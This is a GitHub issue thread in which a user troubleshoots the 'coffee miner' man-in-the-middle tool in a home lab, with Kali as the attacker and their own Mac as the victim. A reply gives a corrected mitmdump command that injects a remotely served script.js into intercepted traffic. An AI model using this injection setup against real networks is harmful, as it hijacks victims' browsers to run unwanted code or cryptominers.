Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

No such script found #27

Open
deangelo200 opened this issue Apr 15, 2018 · 1 comment
Open

No such script found #27

deangelo200 opened this issue Apr 15, 2018 · 1 comment

Comments

@deangelo200
Copy link

deangelo200 commented Apr 15, 2018

Hello I am trying to get the coffee miner to work on my computer. I am using virtual box running kali linux as the attacker on my mac and using my mac as the victim. For the victim.text i placed my mac computer ip address. I think the problem is im mixing up my attacker ip address and gateway ip address. I am getting this error /usr/bin/mitdmdump: No such script: "injector.py http://10.0.2.20:800/scripts.js" can someone please help me

@Zscripts
Copy link

had the same problem. its just the apostropy causing this.
set your line 28 like this and it will work.
("~/.local/bin/mitmdump -s injector.py 'localhost:8000/script.js' --mode transparent")
notice how double and single quotes are set.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants